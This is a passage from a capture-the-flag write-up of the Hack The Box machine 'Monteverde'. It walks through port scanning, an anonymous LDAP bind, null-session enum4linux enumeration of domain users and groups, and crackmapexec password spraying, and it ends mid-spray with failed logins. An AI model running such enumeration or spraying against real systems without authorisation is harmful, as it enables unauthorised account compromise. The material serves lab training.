Monteverde
Completed on 14 Jan 2020.
This Hack The Box machine runs Windows and revolves around Active Directory, LDAP and misconfigurations. The surprise of this machine was seeing Azure (Azure AD Connect) involved; quite interesting.
Some great resources around this are below:
First off, we need to identify how to reach the system; in other words, which services this machine exposes.
Let's start by adding this machine's IP address to the hosts file and create an alias:
root@kali:~/Documents/HTB-Labs/Monteverde# echo "10.10.10.172 monteverde.htb" >> /etc/hosts
My go-to tools in this phase, which most people use to start enumerating, are:
masscan: a very fast port scanner. To me it is a tool to narrow down the scope, so nmap can focus on the open ports only.
Here I designate the interface to use when talking to the HTB machine (-e, the HTB VPN interface), the port range to target (-p; I target ALL TCP and UDP ports) and the transmission rate in packets per second (--rate). Keep in mind that masscan is stateless: at high rates over a VPN it can drop replies and miss ports, so treat its list as a starting point rather than the final word.
Similar to this, you could also run something like:
nmap -p- --min-rate=1000 -T4 monteverde.htb
nmap: I think most people in the IT and security space know what nmap does. It is a very versatile port scanner that can also run scripts (NSE) against the services it finds. Like any tool, it is useful, but it can be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: run the default NSE script set against each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvv: for extended verbosity (as I like as many details as I can get)
user@kali:~/Documents/HTB-Labs/Monteverde$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.172 --rate=1000 | tee Monteverde_masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-11 19:07:09 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 49670/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 49673/tcp on 10.10.10.172
Discovered open port 49702/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 49669/tcp on 10.10.10.172
Discovered open port 49776/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 49667/tcp on 10.10.10.172
Now we can use the output saved in the log file to store the open ports in a variable and make our lives easier:
user@kali:~/Documents/HTB-Labs/Monteverde$ PORTS=$(cat Monteverde_masscan.log | grep Discovered | cut -d" " -f4 | cut -d"/" -f1 | sort | xargs | tr " " ",")
By doing this, we can simply pass the variable to nmap instead of retyping the port list.
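The grep/cut pipeline above does the job, but it sorts lexicographically, keeps duplicates and throws away the tcp/udp distinction, so a UDP hit would be handed to nmap as a TCP port. As an added example (not code from the original write-up), the following Python does the same parsing with a proper split: the sample lines are constructed in masscan's output format, and nmap_port_spec() emits nmap's T:/U: port syntax (UDP ports still need -sU on the nmap side).

```python
"""Parse masscan 'Discovered open port' lines into an nmap -p port spec.

Added example, not from the original write-up. SAMPLE_LOG is a constructed
excerpt in masscan's output format (TCP and UDP mixed, one duplicate).
"""
import re
from typing import Dict, List

SAMPLE_LOG = """\
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-11 19:07:09 GMT
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 49670/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 53/udp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
"""

_LINE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)")


def parse_masscan(text: str) -> Dict[str, Dict[str, List[int]]]:
    """Return {host: {"tcp": [ports], "udp": [ports]}}, numerically sorted, deduplicated."""
    found: Dict[str, Dict[str, set]] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # banners, rate/progress lines
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        found.setdefault(host, {"tcp": set(), "udp": set()})[proto].add(port)
    return {h: {p: sorted(s) for p, s in d.items()} for h, d in found.items()}


def nmap_port_spec(ports: Dict[str, List[int]]) -> str:
    """Build an nmap -p argument such as 'T:53,88,389,U:53' (add -sU to scan the U: part)."""
    parts = []
    if ports["tcp"]:
        parts.append("T:" + ",".join(map(str, ports["tcp"])))
    if ports["udp"]:
        parts.append("U:" + ",".join(map(str, ports["udp"])))
    return ",".join(parts)


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_LOG).items():
        print(f"nmap -sC -sV -sU -p {nmap_port_spec(ports)} {host}")
```

Run it against a real log with `parse_masscan(open("Monteverde_masscan.log").read())`; the T:/U: prefixes are plain nmap syntax, so the resulting string drops straight into -p.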
user@kali:~/Documents/HTB-Labs/Monteverde$ nmap -sC -sV -vvv -p $PORTS monteverde.htb -oX Monteverde_TCP.xml -oN Monteverde_TCP.log
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 22:30 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:30
Completed NSE at 22:30, 0.00s elapsed
Initiating Ping Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [4 ports]
Completed Ping Scan at 22:30, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:30
Scanning monteverde.htb (10.10.10.172) [13 ports]
Discovered open port 135/tcp on 10.10.10.172
Discovered open port 53/tcp on 10.10.10.172
Discovered open port 445/tcp on 10.10.10.172
Discovered open port 593/tcp on 10.10.10.172
Discovered open port 139/tcp on 10.10.10.172
Discovered open port 3268/tcp on 10.10.10.172
Discovered open port 9389/tcp on 10.10.10.172
Discovered open port 389/tcp on 10.10.10.172
Discovered open port 88/tcp on 10.10.10.172
Discovered open port 5985/tcp on 10.10.10.172
Discovered open port 636/tcp on 10.10.10.172
Discovered open port 3269/tcp on 10.10.10.172
Discovered open port 464/tcp on 10.10.10.172
Completed SYN Stealth Scan at 22:30, 0.33s elapsed (13 total ports)
Initiating Service scan at 22:30
Scanning 13 services on monteverde.htb (10.10.10.172)
Completed Service scan at 22:33, 149.13s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.10.172.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 99.94% done; ETC: 22:33 (0:00:00 remaining)
Completed NSE at 22:33, 40.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:33
NSE Timing: About 95.19% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 97.12% done; ETC: 22:34 (0:00:02 remaining)
NSE Timing: About 98.08% done; ETC: 22:35 (0:00:02 remaining)
NSE Timing: About 99.04% done; ETC: 22:35 (0:00:01 remaining)
Completed NSE at 22:35, 120.82s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2020-01-11 22:30:39 EST for 311s
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-12 03:40:13Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5E1A92EB%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 9m25s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48049/tcp): CLEAN (Timeout)
| Check 2 (port 2859/tcp): CLEAN (Timeout)
| Check 3 (port 47166/udp): CLEAN (Timeout)
| Check 4 (port 50283/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-12T03:42:37
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 311.09 seconds
Raw packets sent: 17 (724B) | Rcvd: 14 (600B)
As you can see from the open ports, the following are the important ones:
-> DNS: 53/tcp
-> Kerberos: 88/tcp Microsoft Windows Kerberos
-> MSRPC: 135/tcp Microsoft Windows RPC
-> NetBIOS: 139/tcp Microsoft Windows netbios-ssn
-> LDAP: 389/tcp Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL, Site: Default-First-Site-Name)
-> SMB: 445/tcp
-> LDAPS: 636/tcp
-> Windows Remote Management (WinRM): 5985/tcp Microsoft HTTPAPI httpd 2.0
This combination (DNS, Kerberos, LDAP/LDAPS, the global catalog on 3268/3269 and SMB) is the signature of a domain controller. The "MEGABANK.LOCAL0." in the nmap output is the domain name plus a trailing artifact of nmap's LDAP probe parsing; the domain is MEGABANK.LOCAL. Two host-script results matter later: SMB signing is required (so NTLM relay is off the table) and the clock skew is about 9 minutes, which will break Kerberos-based tools unless we sync our clock to the DC first (Kerberos tolerates 5 minutes by default).
Not all of these are worth hitting first. SMB on 445 returned no banner to the unauthenticated scan, so it shouldn't be our first attempt. MSRPC and NetBIOS can leak some information, but we won't target them directly. LDAP, on the other hand, already returned the domain FQDN, which suggests it may also answer an anonymous (null) bind.
Below is a truncated output (the full result is too long to include), along with the syntax used. -x requests a simple bind with no credentials, i.e. an anonymous bind; on newer OpenLDAP clients -h is deprecated in favour of -H ldap://monteverde.htb.
user@kali:~/Documents/HTB-Labs/Monteverde$ ldapsearch -x -h monteverde.htb -b "dc=megabank,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=megabank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
.
.
.
# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 271
# numEntries: 267
# numReferences: 3
To get a friendlier view, let's use enum4linux over a null session, with MEGABANK as the workgroup/NetBIOS domain name (-w) and all checks enabled (-a):
user@kali:~/Documents/HTB-Labs/Monteverde$ enum4linux -w MEGABANK -a monteverde.htb | tee Monteverde_enum4linux.log
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 20:10:58 2020
==========================
| Target Information |
==========================
Target ........... monteverde.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on monteverde.htb |
======================================================
[+] Got domain/workgroup name: MEGABANK
==============================================
| Nbtstat Information for monteverde.htb |
==============================================
Looking up status of 10.10.10.172
No reply from 10.10.10.172
=======================================
| Session Check on monteverde.htb |
=======================================
[+] Server monteverde.htb allows sessions using username '', password ''
=============================================
| Getting domain SID for monteverde.htb |
=============================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
========================================
| OS information on monteverde.htb |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for monteverde.htb from smbclient:
[+] Got OS info for monteverde.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
===============================
| Users on monteverde.htb |
===============================
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
===========================================
| Share Enumeration on monteverde.htb |
===========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on monteverde.htb
======================================================
| Password Policy Information for monteverde.htb |
======================================================
[+] Attaching to monteverde.htb using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] MEGABANK
[+] Builtin
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
================================
| Groups on monteverde.htb |
================================
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs
Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group 'Users' (RID: 545) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]
[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
Group 'ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
[+] Getting domain group memberships:
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
=========================================================================
| Users on monteverde.htb via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================================
| Getting printer info for monteverde.htb |
===============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jan 12 20:18:11 2020
Thanks to enum4linux we now have a lot of valuable information: not just the users, but the group memberships, several of which are Azure-related (Azure Admins, ADSyncAdmins, ADSyncOperators, ADSyncBrowse, ADSyncPasswordSet). The AAD_ account's description names it as the service account for the Synchronization Service, so Azure AD Connect is installed on this DC.
Alongside the Azure AD sync groups we also have a SQL Server related group, SQLServer2005SQLBrowserUser$MONTEVERDE, which tells us a SQL Server instance with the SQL Browser service is present. Just as important for what comes next: the password policy shows Account Lockout Threshold: None, so password spraying will not lock anyone out here (always check this before spraying a real environment). Let's gather a list of users and test for potential user and password combinations.
user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "user:" | cut -d":" -f2 | cut -d"[" -f2 | cut -d"]" -f1
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
user@kali:~/Documents/HTB-Labs/Monteverde$ cat Monteverde_enum4linux.log | grep "has member" | grep "MEGABANK" | grep "Admins" | cut -d":" -f3 | cut -d"\\" -f2
Administrator
AAD_987d7f2f57d2
mhope
Now we can try the lazy-password approach: a short list of weak passwords plus each username as its own password, sprayed across all the users. A few things to keep in mind with crackmapexec: given two lists it tries the full cross product (every user against every password); newer versions require the protocol keyword (crackmapexec smb <target> ...) and can pair the two lists line by line with --no-bruteforce; and it stops at the first valid credential for a host unless --continue-on-success is set. Spraying is only safe here because the lockout threshold enumerated above is None; with a real threshold, stay under it per reset window.
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec -u Monteverde_userList.txt -p passwdLazy.txt --shares monteverde.htb
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-ata:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-bexec:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\svc-netapp:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\dgalanos:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\roleary:1234567 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:changed STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:password123 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\smorgan:1234567 STATUS_LOGON_FAILURE
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u Monteverde_userList.txt -p Monteverde_userList.txt
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\Guest:smorgan STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:SABatchJobs STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-ata STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-bexec STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:svc-netapp STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:dgalanos STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:roleary STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\mhope:smorgan STATUS_LOGON_FAILURE
